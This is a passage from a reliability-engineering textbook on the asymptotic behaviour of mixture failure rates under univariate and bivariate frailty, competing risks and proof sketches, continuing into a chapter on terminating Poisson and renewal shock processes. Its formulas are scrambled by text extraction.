π ( z ), z ∈ [a, ∞) is bounded, continuous at z = a and satisfies π (a) ≠ 0 . Let λ ′(t ) → 0 , tλ (t ) → ∞ (λ (t )) 2 (7.35) as t → ∞ . Assume also that for all b, c > 0, b < c , the quotient λ (bx ) / λ (cx) is bounded as x → ∞ . Then, in accordance with (7.22), the mixture failure rate for Model (7.13) has the following asymptotic behaviour: λm (t ) ~ aλ0 (at ). (7.36) Condition (7.35) is rather weak. For example, in the marginal case of the Pareto distribution (with the baseline failure rate of the form λ (t ) = ct −1 , c > 0, t ≥ 1 ), this condition is not satisfied, but in mixing we are primarily interested in the increasing baseline failure rates. 7.5.3 Proportional Hazards and Other Possible Models Owing to its simplicity, the asymptotic behaviour of λm (t ) in the additive hazards model (7.14) does not deserve special attention. As A( s ) = s and φ (t ) = t , Conditions (7.16) and (7.17) of Theorem 7.2 hold and the asymptotic result (7.18) simplifies to α +1 + ψ ′(t ) . λm (t ) ~ t as t → ∞ . 184 Failure Rate Modelling for Reliability and Risk Thus, even in the case where the support of the mixing variable is [0, ∞) , the function ψ ′(t ) can be formally interpreted as the failure rate of the strongest population. Then Theorem 7.2, where the baseline failure rate λ (t ) = ψ ' (t ) is an increasing convex function, can be ‘completed’ by stating that λm (t ) is ultimately increasing in such a way that lim t →∞ (λm (t ) − λ (t )) = 0 . Theorem 7.3 can also be generalized in an obvious way. Some combinations of the specific models considered can be analysed using the asymptotic approach developed in this chapter. For instance, the generalized ‘proportional-accelerated life-additive’ model λ (t , z ) = z k λ ( z mt ) + ψ ′(t ), k , m > 0 can be formally investigated after a suitable adjustment of Model (7.10) and of the corresponding asymptotic Theorem 7.2, although the practical usefulness of this model is not clear so far. Esaulova (2006) generalized the results of this section to a lifetime model of the following form: Λ (t , z ) = A(η ( z )φ (t )) + ψ (t ), where η (z ) is a differentiable and strictly monotone function for all z ≥ 0 . 7.6 Asymptotic Mixture Failure Rates for Multivariate Frailty 7.6.1 Introduction In the previous sections, we considered a lifetime random variable T indexed by a frailty parameter Z . The next obvious step of generalization is to study a multivariate frailty. This means that there can be several unobserved parameters (independent or dependent), which is often the case in practice. Note that T , as previously, is the univariate lifetime random variable. The simplest model is the bivariate multiplicative model, which is an obvious generalization of the univariate multiplicative model (7.12), i.e., λ (t , z1 , z 2 ) = z1 , z 2 λ (t ) . (7.37) We shall consider this specific model in Section 7.6.4. Let Z1 and Z 2 be interpreted as non-negative random variables with supports in [0, ∞) . Similar to Section 6.1, Pr[T ≤ t | Z1 = z , Z 2 = z 2 ] ≡ Pr[T ≤ t | z1 , z 2 ] = F (t , z1 , z 2 ) and λ (t , z1 , z 2 ) = f (t , z1 , z 2 ) . F (t , z1 , z 2 ) Limiting Behaviour of Mixture Failure Rates 185 Assume that Z1 and Z 2 have a bivariate joint pdf π ( z1 , z 2 ) . The mixture failure rate is defined in this case as ∞∞ λm (t ) = f m (t ) = Fm (t ) ∫∫ f (t , z , z )π ( z , z )dz dz 1 2 1 2 1 2 0 0 ∞∞ ∫∫ F (t , z , z )π ( z , z )dz dz 1 2 1 2 2 | t )dz1dz 2 , 1 2 0 0 ∞∞ = ∫ ∫ λ (t, z , z )π ( z , z 1 2 1 (7.38) 0 0 where the conditional pdf, similar to Equations (3.10) and (6.5), is π ( z1 , z 2 | t ) = π ( z1 , z 2 ) ∞ ∞ ∫∫ F (t , z1 , z 2 ) . (7.39) F (t , z1 , z 2 )π ( z1 , z 2 )dz1dz 2 0 0 In what follows in this section, we consider two specific bivariate frailty models. Our goal is to apply the developed asymptotic methodology to the bivariate setting. 7.6.2 Competing Risks for Mixtures Consider firstly, a system of two statistically independent components in series with lifetimes T1 ≥ 0, T2 ≥ 0 and distribution functions F1 (t ), F2 (t ) , respectively. As the system fails when the first failure of a component occurs, this setting can also be interpreted in terms of the corresponding competing risks. The Cdf function of a system is obviously Fs (t ) = 1 − F1 (t ) F2 (t ) . Therefore, the competing risks setting reduces the bivariate problem to the univariate one. As in the univariate case, assume that distributions Fi (t ), i = 1,2 are indexed by random variables (frailties) Z i with supports in [0, ∞) , i.e., Pr[Ti ≤ t | Z i = z ] ≡ Pr[Ti ≤ t | z ] = Fi (t , z ) . The corresponding mixture failure rates, as in Equation (6.5), are defined in the following way: 186 Failure Rate Modelling for Reliability and Risk ∞ λm,i (t ) = f m,i (t ) Fm,i (t ) ∫ f (t, z )π ( z )dz i = i 0 ∞ ∫ F (t, z )π ( z )dz i i 0 = λ i (t , z )π i ( z | t )dz , i = 1,2 , (7.40) 0 where the conditional pdf π i ( z | t ) is given by Equation (3.10). Assume now that the components of our system are conditionally independent given Z1 = z1 , Z 2 = z 2 . This is an important assumption. Then Fs (t , z1 , z 2 ) = 1 − F1 (t , z1 ) F2 (t , z 2 ) , (7.41) and the corresponding pdf is f s (t , z1 , z 2 ) = f1 (t , z1 ) F (t , z 2 ) + f 2 (t , z 2 ) F1 (t , z1 ) . (7.42) Thus the components are dependent only via the possible dependence between Z1 and Z 2 , which is described by the joint pdf π ( z1 , z 2 ) . The mixture failure rate of this system λm,s (t ) is given by Equation (7.38), where λm (t ), f (t , z1 , z ) and F (t , z1 , z 2 ) are substituted by λm,s (t ), f s (t , z1 , z ) and Fs (t , z1 , z 2 ) , respectively. Obviously, the failure rate of the system is the sum of the components’ failure rates, i.e., λs (t , z1 , z 2 ) = λ1 (t , z1 ) + λ2 (t , z 2 ) . (7.43) If Z1 and Z 2 are independent, which means that π ( z1 , z 2 ) = π 1 ( z1 )π 2 ( z 2 ) , then the bivariate conditional density (7.39) is also a product of the corresponding univariate conditional densities. This can be seen using Equations (7.39)–(7.41): F1 (t , z1 ) F2 (t , z 2 ) π ( z1 , z 2 | t ) = π 1 ( z1 )π 2 ( z 2 ) ∞ ∞ ∫ ∫ F (t, z ) F (t , z )π ( z ), π 1 1 2 2 1 1 2 ( z 2 )dz1dz 2 0 0 = π 1 ( z1 ) F1 (t , z1 )π 2 ( z 2 ) F2 (t , z 2 ) ∞ ∫ F1 (t , z1 )π 1 ( z1 )dz1 ∫ F2 (t , z2 )π 2 ( z2 )dz2 0 0 = π 1 ( z1 | t )π 2 ( z 2 | t ) . (7.44) Therefore, when the components of the system are conditionally independent and Z1 and Z 2 are independent, the mixture failure rate of the system is the sum of the Limiting Behaviour of Mixture Failure Rates 187 mixture failure rates of individual components, which, taking into account Equations (7.38),(7.43) and (7.44), is clearly seen from the following: ∞∞ λm,s (t ) = ∫ ∫ λ (t , z1 , z 2 )π ( z1 , z 2 | t )dz1dz 2 0 0 ∞∞ = ∫ ∫ [λ1 (t , z1 ) + λ2 (t , z 2 )]π ( z1 , z 2 | t )dz1dz 2 0 0 0 0 = ∫ λ1 (t , z1 )π 1 ( z1 | t )dz1 + ∫ λ2 (t , z 2 )π 1 ( z 2 | t )dz 2 = λ m,1 (t ) + λ m, 2 (t ) . (7.45) Note that this result does not hold for the case of shared frailty for Z1 ≡ Z 2 ≡ Z , which can be shown directly by similar integration. Mixture failure rates for some specific mixing distributions and shared frailties were considered by Yashin and Iachine (1999). 7.6.3 Limiting Behaviour for Competing Risks Now we turn to a study of the asymptotic behaviour of a mixture failure rate of a system for the case when frailties Z1 and Z 2 are correlated. The method is based on the approach of Section 7.3 developed for the univariate case. Assume that survival functions for the components are given by (7.10), where the non-important additive term is set to be 0 , i.e., Fi (t , zi ) = exp{− Ai ( ziφi (t )), i = 1,2 . (7.46) The following theorem generalizes Theorem 7.2 to the bivariate case. Its proof can be found in Finkelstein and Esaulova (2008). Theorem 7.5. Let the components’ survival functions in the competing risks model (7.41) be defined by Equation (7.46), where the mixing variables Z1 and Z 2 have the joint pdf π ( z1 , z 2 ) . Let the following hold: • • • π ( z1 , z 2 ) = z1α1 z 2α 2 π 0 ( z1 , z 2 ), where the function π 0 ( z1 , z 2 ) is continuous at (0,0) and bounded in [0, ∞) × [0, ∞) , π (0,0) ≠ 0 and α1 , α 2 > −1 . The increasing functions φi (t ), i = 1,2 tend to infinity as t → ∞ . The increasing functions Ai ( s ), i = 1,2 are differentiable and satisfy ∞ ∫ exp{− A (s)}s i 0 αi ds < ∞ . 188 Failure Rate Modelling for Reliability and Risk Then the asymptotic mixture failure rate of the system is given by the following asymptotic relationship: φ ′(t ) φ ′ (t ) (7.47) λm,s (t ) ~ (α1 + 1) 1 + (α 2 + 1) 2 . φ2 (t ) φ1 (t ) It follows from the additive nature of (7.47) and Equation (7.19) that the asymptotic mixture failure rate in our model can be viewed as the sum of univariate mixture failure rates of each component with its own independent frailty. Therefore, taking into account Equation (7.45), we can interpret Theorem 7.5 in the following way: The mixture failure rate λ m, s (t ) in the correlated frailty model with conditionally independent components is asymptotically equivalent to the corresponding mixture failure rate in the independent frailty model. Therefore, this theorem describes some ‘vanishing dependence’ as t → ∞ . The first assumption of Theorem 7.5 imposes certain restrictions on the mixing distribution. In the univariate case, Equation (7.15) holds, e.g., for gamma, Weibull and lognormal distributions. In the bivariate case, all mixing densities that are positive and continuous at the origin are obviously admissible. Example 7.6 Gumbel Bivariate Exponential Distribution The survival function of this distribution is (Equation 3.26) S ( z1 , z 2 ) = exp{− z1 − z 2 − δ z1 z 2 } , where 0 ≤ δ ≤ 1 . The mixing pdf is π ( z1 , z 2 ) = exp{− z1 − z 2 − δ z1 z 2 }{(1 + δ z1 )(1 + δ z 2 ) − δ } . This pdf is bounded and continuous in [0, ∞) 2 and π (0,0) = 1 − δ . Thus, for 0 ≤ δ < 1 , the mixing density satisfies the conditions of Theorem 7.5 and Relationship (7.47) holds. It can easily be checked that the Farlie–Gumbel–Morgenstern distribution defined in Example 3.9 also meets the requirements for the admissible mixing distribution. Other distributions of this class are the Dirichlet distribution, the inverted Dirichlet distribution, some types of multivariate logistic distributions (Kotz et al., 2000), etc. There are also examples of when conditions of Theorem 7.5 do not hold. The Marshall–Olkin bivariate exponential distribution defined by Equation (3.30) depends on max( z1 , z 2 ) and therefore is not absolutely continuous. Finally, in order to illustrate the result of Theorem 7.5, as in Section 7.4, consider the specific cases. Assume that the model for each component is a multiplicative one, i.e., λi (t , zt ) = zi λi (t ), i = 1,2 , and that α1 = α 2 = 0 in the joint mixing pdf π ( z1 , z 2 ) . Then, in accordance with Limiting Behaviour of Mixture Failure Rates 189 (7.47), as t → ∞ , λm,s (t ) ~ λ1 (t ) t + λ2 (t ) . t ∫ λ (u)du ∫ λ (u)du 1 2 0 0 In a similar way, for the ALM λi (t , zi ) = zi λ (tzi ) , we get λm,s (t ) ~ 2 . t Both of these formulas show that the asymptotic behaviour of mixture failure rates does not depend on the mixing distribution. 7.6.4 Bivariate Frailty Model In this section, we will briefly discuss another bivariate frailty model, which is defined for a single lifetime random variable T . It is a generalization of the simplest multiplicative model (7.37): λ (t , z1 , z 2 ) = G ( z1 , z 2 )λ (t ) , (7.48) where G ( z1 , z 2 ) is some positive bivariate function. The corresponding survival and the probability density functions are F (t , z1 , z 2 ) = exp{−G ( z1 , z 2 )Λ(t )}, f (t , z1 , z 2 ) = G ( z1 , z 2 )λ (t ) exp{−G ( z1 , z 2 )Λ(t )} , respectively. Let the function G ( z1 , z 2 ) be invertible with respect to z1 , and denote by B( z1 , z 2 ) the corresponding inverse function, i.e., B (G ( z1 , z 2 ), z 2 ) ≡ z1 , G ( B( z1 , z 2 ), z 2 ) ≡ z1 . Changing the variable of integration in the equation for the mixture (marginal) survival function Fm (t ) to s = G ( z1 , z 2 ) gives ∞∞ Fm (t ) = ∫ ∫ exp{−G( z , z )Λ(t )}π ( z , z )dz dz 1 2 1 2 1 2 0 0 ∞ = exp{−Λ (t ) s} 0 0 ∂B ( s, z 2 ) π ( B ( s, z 2 ), z 2 )dz 2 ds ∂s = exp{−Λ (t ) s}g ( s ) ds , 0 190 Failure Rate Modelling for Reliability and Risk where the function g (s ) is defined as ∞ g (s) = ∫ 0 ∂B ( s, z 2 ) π ( B ( s, z 2 ), z 2 )dz 2 . ∂s Similarly, the corresponding pdf is ∞ f m (t ) = λ (t ) exp{−Λ (t ) s}sg ( s ) ds . 0 It can be seen that, as ∞ ∞∞ g ( s )ds = 0 ∫ ∫ π ( z , z )dz dz 1 2 1 2 =1, 0 0 the function g (s ) can be interpreted as a pdf. Equation (7.48) defines a multiplicative model. Therefore, the corresponding results of Section 7.4.1 can be applied with the obvious substitution of π (z ) by g (z ) . We will consider now an example where the asymptotic relationship for the mixture failure rate λm (t ) is obtained via direct integration. Example 7.7 Let the function G ( z1 , z 2 ) in (7.48) be defined as in (7.37), i.e., G ( z1 , z 2 ) = z1 z 2 . Obviously, B ( s, z 2 ) = s , z2 ∂B ( s, z 2 ) 1 = , ∂s z2 ∂G ( z1 , z 2 ) = z2 . ∂z1 Assume that the mixing distribution is uniform in [0, b] × [0, b] for some b > 0 . ⎧1 / b 2 , 0 ≤ z1 , z 2 ≤ b, π ( z1 , z 2 ) = ⎨ ⎩0, otherwise. Then Fm (t ) = 1 b2 b b ∫∫ b exp{− Λ(t ) xy}dxdy = 0 0 = 1 Λ (t )b 2 Λ (t )b2 ∫ 0 1 1 (1 − exp{−Λ (t )by}) dy 2 b 0 Λ (t ) y 1 (1 − exp{−u}}du . u It can be seen that, as v → ∞ , v 1 ∫ u (1 − exp{−u}}du ~ log v . 0 Limiting Behaviour of Mixture Failure Rates 191 Therefore, finally, Fm (t ) ~ log Λ(t ) Λ (t )b 2 (7.49) as t → ∞ . Similarly (Esaulova, 2006), f m (t ) ~ λ (t ) log Λ(t ) (Λ (t )) 2 b 2 (7.50) and λm (t ) = f m (t ) λ (t ) , t → ∞, ~ Fm (t ) Λ(t ) (7.51) which is a remarkably simple asymptotic relation that is similar to (7.26) for the univariate model. Example 7.8 Consider another special case where the function G ( z1 , z 2 ) in (7.48) is additive, i.e., G ( z1 , z 2 ) = z1 + z 2 . Then ∂B ( s, z 2 ) ∂G ( z1 , z 2 ) ≡ = 1. ∂s ∂z1 B ( s, z 2 ) = s − z 2 , Assume that the function s g ( s ) = ∫ π ( s − z 2 , z 2 )dz 2 (7.52) 0 can be written as g ( s ) = s α g1 ( s ) , where α > −1 and g1 ( z ) is bounded in [0, ∞) , continuous at z = 0 and g1 (0) ≠ 0 . Then, in accordance with Corollary 7.1, the asymptotic formula ( t → ∞ ) for the mixture failure rate is λm (t ) ~ (α + 1)λ (t ) . Λ (t ) (7.53) On the other hand, it is more relevant to formulate the result explicitly in terms of the initial bivariate mixing pdf π ( z1 , z 2 ) . Assume that π ( z1 , z 2 ) satisfies the first 192 Failure Rate Modelling for Reliability and Risk condition of Theorem 7.5. It follows from Equation (7.52) that, as s → 0 , g ( s ) ~ s α +α +1π (0,0) . 1 2 Therefore, (7.53) can be transformed into λm (t ) ~ (α1 + α 2 + 2)λ (t ) , Λ (t ) (7.54) which is the same result that can be obtained directly from (7.47). This is not surprising, because the considered model can also be interpreted as the mixture failure rate model for a series system with conditionally independent components and dependent frailties. The next section contains the brief proofs of the theorems of this chapter. The full text of the proofs can be found in Finkelstein and Esaulova (2006a, 2008). 7.7 Sketches of the Proofs Proof of Theorem 7.2. We start with a simple lemma. Lemma 7.1. Let g (z ) and h(z ) be non-negative functions in [0, ∞) satisfying the following conditions: ∞ ∫ g ( z )dz < ∞ , 0 and let h( z ) be bounded and continuous at z = 0 . Then, as t → ∞ , ∞ 0 0 t ∫ g (tz )h( z )dz → h(0) ∫ g ( z )dz . (7.55) Proof. Substituting u = tz gives ∞ 0 0 t ∫ g (tz )h( z )dz = ∫ g (u )h(u / t )du . The function h(u ) is bounded and h(u / t ) → 0 as t → ∞ ; thus convergence (7.55) holds by the dominated convergence theorem. Now we can proceed with the proof of Theorem 7.2. The survival function, which corresponds to (7.10), is F (t , z ) = exp{−( A( zφ (t ))} , where we assume that the non-important additive term is zero: ψ (t ) ≡ 0 . Taking into account that φ (t ) → ∞ as t → ∞ , and applying Lemma 7.1 to the function g (u ) = exp{− A(u )}uα , gives Limiting Behaviour of Mixture Failure Rates ∞ 0 0 193 α ∫ F (t, z )π ( z )dz = ∫ exp{−( A( zφ (t ))}z π 1 ( z )dz ~ exp{−ψ (t )}π 1 (0) φ (t ) α +1 ∫ exp{− A(s)}s α ds , (7.56) 0 where the integral is finite owing to (7.17). Similarly, applying Lemma 7.1 to the corresponding pdf: ∞ ∫ 0 f (t , z )π ( z )dz = φ ′(t ) ∫ A′( zφ (t )) exp{− A( zφ (t ))}z α +1π 1 ( z )dz 0 ~ φ ′(t )π 1 (0) ∞ A′( s ) exp{− A( s )}s α +1 ds . φ (t ) α + 2 ∫0 (7.57) It can be shown with the help of (7.17) that exp{− A( s )}sα +1 → 0 as t → ∞. Using this fact and integrating by parts yields ∞ 0 0 α +1 α ∫ A′(s) exp{− A(s)}s ds = (α + 1)∫ exp{− A(s)}s ds . (7.58) Combining Equations (7.56)–(7.58) finally results in ∞ ∫ f (t , z )π ( z )dz 0 ∞ ∫ F (t, z )π ( z )dz ~ (α + 1) φ ′(t ) . φ (t ) 0 Proof of Theorem 7.3. This theorem is rather technical and we must use three supplementary lemmas that present consecutive steps on the way to (7.22). We state these lemmas without proofs (Finkelstein and Esaulova, 2006a). Lemma 7.2. Let h( x ) be a twice-differentiable function with an ultimately positive derivative, such that ∞ ∫ exp{−h( y)}dy < ∞ . 0 Also let h′′( x) /(h′( x)) 2 → 0 as x → ∞ . 194 Failure Rate Modelling for Reliability and Risk Then ∞ 1 ∫ exp{−h( y)}dy ~ exp{−h( x)} h′( x) x as x → ∞ . We use this lemma to obtain the following one. Lemma 7.3. Let the assumptions of Lemma 7.2 hold. Assume additionally that xh′( x) → ∞, x → ∞ . Let μ (u ) be a positive, bounded and locally integrable function defined in [a, ∞) , continuous at u = a . Assume that μ (a ) ≠ 0 . Then ∞ μ (a) exp{−h(ax)} ∫a exp{−h(ux)}μ (u)du ~ xh′(ax) as x → ∞ . Lemma 7.4. Under the assumptions of Lemma 7.2, the following asymptotic relationship holds as x → ∞ : ∞ ∫ h′(ux) exp{−h(ux)}uμ (u)du ~ a aμ (a) exp{−h(ax)} . x Now we are ready to prove Theorem 7.3 itself. Applying Lemma 7.3 as t → ∞ results in ∞ a a ∫ F (t, z )π ( z )dz = ∫ exp{−( A( zφ (t ))}π ( z )dz ~ π (a ) exp{− A(aφ (t ))}. ′ A (aφ (t ))φ (t ) Therefore, ∞ a a ∫ f (t, z )π ( z )dz = φ ′(t )∫ A′( zφ (t )) exp{− A( zφ (t ))}zπ ( z )dz. Using Lemma 7.4 results in the following relationship: ∞ ∫ A′( zφ (t )) exp{− A( zφ (t ))}zπ ( z )dz ~ a and finally, we arrive at (7.22), i.e., aπ (a) exp{− A(aφ (t )) φ (t ) Limiting Behaviour of Mixture Failure Rates 195 λm (t ) = ∫ f (t , z )π ( z )dz 0 ∞ ∫ F (t , z )π ( z)dz 0 ~ A′(aφ (t ))φ (t ) φ ′(t )aπ (a ) exp{− A(aφ (t ))} ⋅ φ (t ) π (a ) exp{− A(aφ (t ))} = aφ ′(t ) A′(aφ (t )). Proof of Theorem 7.4. We consider the numerator and the denominator in (7.24) separately. Changing variables and applying Lemma 7.1 we obtain ∞ 0 a α ∫ F (t , z)π ( z )dz = ∫ exp{− zΛ 0 (t )}( z − a) π 1 ( z − a)dz ∞ = exp{−aΛ 0 (t ) ∫ exp{− zΛ 0 (t )}z α π 1 ( z )dz 0 ~ exp{−aΛ 0 (t )}π 1 (0)Γ(α + 1) (Λ 0 (t ))α +1 . (7.59) Similarly, ∞ 0 a α ∫ zf (t, z )π ( z )dz = λ0 (t )∫ z exp{− zΛ 0 (t )}( z − a) π 1 ( z − a)dz ∞ = λ0 (t ) exp{− aΛ 0 (t )}∫ exp{− zΛ 0 (t )}z α +1π 1 ( z )dz 0 + aλ0 (t ) exp{− aΛ 0 (t )}∫ exp{− zΛ 0 (t )}z α π 1 ( z )dz . 0 As t → ∞ , the first integral on the right-hand side is equivalent to π 1 (0)Γ(α + 2)(Λ 0 (t )) −α − 2 and the second integral is equivalent to π 1 (0)Γ(α + 1)(Λ 0 (t )) −α −1 , which decreases more slowly than the first one. Thus, ∞ ∫ zf (tz)π ( z )dz ~ 0 aλ0 (t ) exp{−aΛ 0 (t )}π 1 (0)Γ(α + 1) . (Λ 0 (t ))α +1 (7.60) Finally, substituting (7.59) and (7.60) into Equation (7.24), we arrive at (7.29). 196 Failure Rate Modelling for Reliability and Risk 7.8 Chapter Summary A general class of distributions is discussed in this chapter. This class contains as special cases the additive, multiplicative and accelerated life models that are widely used in reliability practice. The corresponding asymptotic theory is developed and applied to deriving and analysing asymptotic failure rates. We also use the developed approach for obtaining asymptotic failure rates in the correlated competing risks setting. It turns out that as t → ∞ , the correlation can ‘fade out’. There are many applications where the behaviour of the failure rate at relatively large values of t is really important. In Chapter 6, the example of the oldest-old mortality was discussed when the exponentially increasing Gompertz mortality curve is ‘bent down’ for advanced ages (mortality plateau). Some of the obtained results are very surprising. For example, when the support of the mixing distribution is [0, ∞) , the mixture failure rate in the accelerated life model converges to 0 as t → ∞ and does not depend on the baseline distribution. Under reasonable assumptions, we prove that the asymptotic behaviour of the mixture failure rate for other models depends only on the behaviour of the mixing distribution in the neighbourhood of the left-hand endpoint of its support, and not on the whole mixing distribution. The presentation of results in this chapter is rather technical. Therefore, sketches of the proofs of the main theorems are deferred to the last section. 8 ‘Constructing’ the Failure Rate In this chapter, we will consider several specific settings when the failure rate can be obtained (constructed) directly as an exact or an approximate relationship. Along with meaningful heuristic considerations, exact solutions and approaches will also be discussed where possible. Most examples to follow are based on the operation of thinning of the Poisson process (Cox and Isham, 1980) or on equivalent reasoning. In many instances this method can be very helpful and often results in significant simplifications. The choice of the problems to be considered is defined by the projects in which the author took part recently and by the corresponding publications. A basic feature of the models to be discussed is defined by an underlying point process of events that can be terminated in some way. Termination of this process usually results in, e.g., a mission failure or the failure of a system, etc. Most of the results are obtained for the underlying Poisson process (homogeneous or nonhomogeneous). In this case, the corresponding failure rate, and therefore the probability of termination can usually be obtained in an explicit form under reasonable assumptions. Termination of renewal processes, however, usually cannot be modelled explicitly and only bounds and approximations exist for reliability measures of interest. In Section 8.3 we apply the developed approach to obtaining the survival probability of an object which is moving in a plane and encountering moving or (and) fixed obstacles. In the safety at sea application terminology, each foundering or collision results in a failure (accident) with a predetermined probability. It will be shown that this setting can be reduced to the one-dimensional case. In Section 8.4, the notion of multiple availability is discussed. The corresponding probabilities are also obtained using the operation of thinning of the Poisson process. By properly adjusting the term ‘failure’, other sections of this chapter can also be easily interpreted in terms of safety and risk analysis. 8.1 Terminating Poisson and Renewal Processes Two equivalent interpretations for the termination of the Poisson process are usually considered in the literature. The first one is often referred to as a method of the 198 Failure Rate Modelling for Reliability and Risk per demand failure rate (Thompson, 1988). Its probabilistic description is simple, and therefore it is widely used in reliability practice. In accordance with the notation of Chapter 4, let λr be the rate of the homogeneous Poisson process N (t ), t ≥ 0 , describing instantaneous demands of some kind. Assume that each demand is instantaneously serviced with probability 1 − θ and is not serviced with the complementary probability θ . Let T be the time to failure of this ‘system’ defined as the time to the first non-serviced demand or, equivalently, to the termination of our process. In accordance with the definition of the homogeneous Poisson process, (λ t ) n , (8.1) Pr[ N (t ) = n] = exp{−λr t} r n! and the corresponding survival probability (the probability that all demands in [0, t ] have been serviced) can be obtained directly in the following way: ∞ Pr[T ≥ t ] = F (t ) = ∑ (1 − θ ) k exp{−λr t} 0 = exp{−θ λr t} . (λr t )k k! (8.2) It follows from Equation (8.2) that the corresponding failure rate, which is defined by the distribution F (t ) , is given by a simple and meaningful relationship: λ (t ) = θ λr . (8.3) Thus, the rate of the underlying Poisson process λr is decreased by the factor θ ≤1. On the other hand, the classical operation of thinning of the point process (Cox and Isham, 1980) means that each point of the process is deleted with probability θ or retained in the process with the complementary probability 1 − θ . Therefore, the described thinned Poisson process has the rate (1 − θ )λr . It follows from the properties of the Poisson process that the time to the first deletion (failure) is described by the Cdf with the failure rate θ λr , which is equal to (8.3). Note that the operation of thinning can be very effective in many applications. A number of problems in reliability, risk and safety analysis can be interpreted by means of the described model. Similar to (8.2), the result can be generalized in a straightforward way to the case of the NHPP with rate λr (t ) , i.e., ⎞ ⎛ t F (t ) = exp⎜ − ∫ θ λr (u )du ⎟, ⎟ ⎜ ⎠ ⎝ 0 λ (t ) = θ λr (t ) , (8.4) where the additional assumption that the distribution F (t ) should be a proper one ( F (∞) = 1 ) is imposed, i.e., ∞ ∫ θλ (u)dx = ∞ . r 0 ‘Constructing’ the Failure Rate 199 Another useful and widely used interpretation is via the process of shocks. In fact, a shock can also be considered as a demand of some kind. In Chapter 10, we consider the demands for energy. When these demands are ‘non-serviced’, the death of an organism occurs. We understand the term “shock” in a very broad sense as some instantaneous, potentially harmful event. Shock models are widely used in practical and theoretical reliability. For example, they can present a useful framework for studying ageing properties of distributions (Barlow and Proschan, 1975; Beichelt and Fatti, 2002). Assume that a shock is the only cause of failure. This means that a system is ‘absolutely reliable’ in the absence of shocks. Assume now, similar to the “per demand” interpretation, that a shock affecting a system independently from the previous shocks results in its failure (and in the termination of the corresponding Poisson shock process) with probability θ and does not cause any changes in the system with the complementary probability 1 − θ . It is obvious that the survival probability and the failure rate are defined in this case by Equations (8.2) and (8.3), respectively. Note that the described setting is often referred to as an extreme shock model, as only the impact of the current shock is taken into account, whereas in cumulative shock models the impact of preceding shocks is accumulated (Sumita and Shanthikumar, 1985; Gut and Husler, 2005). When the function θ (t ) depends on time, other approaches should be used for deriving the following generalization to Equation (8.4): ⎞ ⎛ t F (t ) = exp⎜ − θ (t ) λr (u )du ⎟ , ⎟ ⎜ ⎠ ⎝ 0 λ (t ) = θ (t ) λr (t ) . (8.5) This result was first proved in a direct way using cumbersome derivations in Beichelt and Fischer (1980) (see also Beichelt, 1981, and Block et al., 1985). We will present now a non-technical proof of (8.5) based on the notion of the conditional intensity function (CIF) λ (t | Η (t )) described by Definition 4.2 and Equation (4.4). As in Chapter 4, λr (t ) denotes the rate of an orderly point process of shocks. In accordance with Definition 4.2 and using the independence of the previous shocks property, the following reasoning becomes straightforward: ~ λ (t | T (Η (t )) ≥ t )dt = Pr[T ∈ [t , t + dt ) | T (Η (t )) ≥ t ] = = Pr[T ∈ [t , t + dt ), T (Η (t ) ≥ t ] Pr[T (Η (t ) ≥ t ] θ (t )λr (t | H (t )) Pr[T (Η (t ) ≥ t ] Pr[T (Η (t ) ≥ t ] dt = θ (t )λr (t | Η (t ))dt , ~ where λ (t | T (Η (t )) ≥ t )dt is the conditional probability of the termination of our point process of shocks in [t , t + dt ) and λr (t | Η (t )) is the corresponding CIF. The 200 Failure Rate Modelling for Reliability and Risk condition T (Η (t )) ≥ t means that all shocks in [0, t ) for this realization were survived. ~ Note that the function λ (t | T (Η (t )) ≥ t ) depends on the realization Η (t ) . Therefore, in accordance with Definition 2.1, it cannot define the conventional failure rate λ (t ) . On the other hand, it is well known (see Equation 4.5) that λr (t | Η (t )) = λr (t ) for the specific case of the homogeneous Poisson process, as this is the only process with the memoryless property. Finally, the failure rate λ (t ) that corresponds to the random time to termination is ~ λ (t ) = λ (t | T (Η (t )) ≥ t ) = θ (t )λr (t ) in each realization of the considered NHPP process of shocks. Therefore, it is clear that Equation (8.5) holds. A similar reasoning can be found, e.g., in Finkelstein (1999a) and Nachlas (2005). Unfortunately, a renewal process of shocks does not allow for similar meaningful, simple formulas, and, as we have already mentioned, bounds and approximations should be used for the probabilities of interest in this case. In the rest of this section, we will briefly describe some initial results for terminating renewal processes only. Under the same general assumption as for the NHPP, consider the terminating renewal process with a constant probability θ of termination at each cycle. As previously, T denotes the time to termination of a process and let X , with the Cdf G (t ) and E[ X ] < ∞ , be the underlying interarrival time. The corresponding survival probability can be written in the form of the following infinite series: Pr[T ≥ t ] = F (t ) = ∑ (1 − θ ) k −1 G ( k ) (t ) , (8.6) k =1 where, as in Section 4.3.2, G ( n ) (t ) denotes the n -fold convolution of G (t ) with itself and G ( n ) (t ) = 1 − G ( n ) (t ) . Note that the corresponding series for the Poisson process is given by Equation (8.2). Special numerical methods should be used for obtaining F (t ) in this case. Therefore, it is important to have simple approximations and bounds for this probability. It is well known (see, e.g., Kalashnikov, 1997) that, as θ → 0 , the following convergence in distribution takes place: ⎧ θt ⎫ F (t ) → 1 − exp⎨− ⎬. ⎩ E[ X ] ⎭ (8.7) Thus, the failure rate that corresponds to the Cdf F (t ) in this case is approximately constant for sufficiently small θ , i.e., λ (t ) ≈ θ E[ X } . (8.8) ‘Constructing’ the Failure Rate 201 Relationship (8.8) becomes Equation (8.3) when interarrival times are distributed exponentially. In practice, parameter θ is not always sufficiently small for effectively using this approximation and therefore, the corresponding upper and lower bounds for F (t ) can be very helpful. Assume that G (t ) satisfies the CramerLundberg condition, stating the existence of a constant k > 0 such that ∞ θ ∫ exp{ku}dG (u ) = 1 , 0 where θ ≡ 1 − θ . Then F (t ) has the following bounds: exp{−kt} θ (1 − kE[ξ (t )]) ≤ F (t ) ≤ exp{−kt} , θ where ξ (t ) is the forward waiting time (the time since arbitrary t to the next moment of renewal) in the renewal process governed by the Cdf G (t ) (Kalashnikov, 1997). Another bound that is useful in practice but rather crude (Finkelstein, 2003a) is based on the following identity: [ ] = ∑θ ∞ N (t ) k (G ( k ) (t ) − G ( k +1) (t )) = F (t ) , k =0 which immediately follows after recalling that for the renewal process (Ross, 1996) Pr[ N (t ) = n] = G ( n ) (t ) − G ( n+1) (t ) . As the power function is a convex one, Jensen’s inequality can be used, i.e., [ F (t ) = E θ N ( t )t ]≥ θ E [ N ( t )t ] H (t ) , where, as usual, H (t ) = E[ N (t )] is the corresponding renewal function. 8.2 Weaker Criteria of Failure 8.2.1 Fatal and Non-fatal Shocks In the previous section, a system could be ‘killed’ by a single shock or, equivalently, a shock process could be terminated at each step. An important assumption was that the probability of this termination did not depend on the history of the shock process. Assume now that we 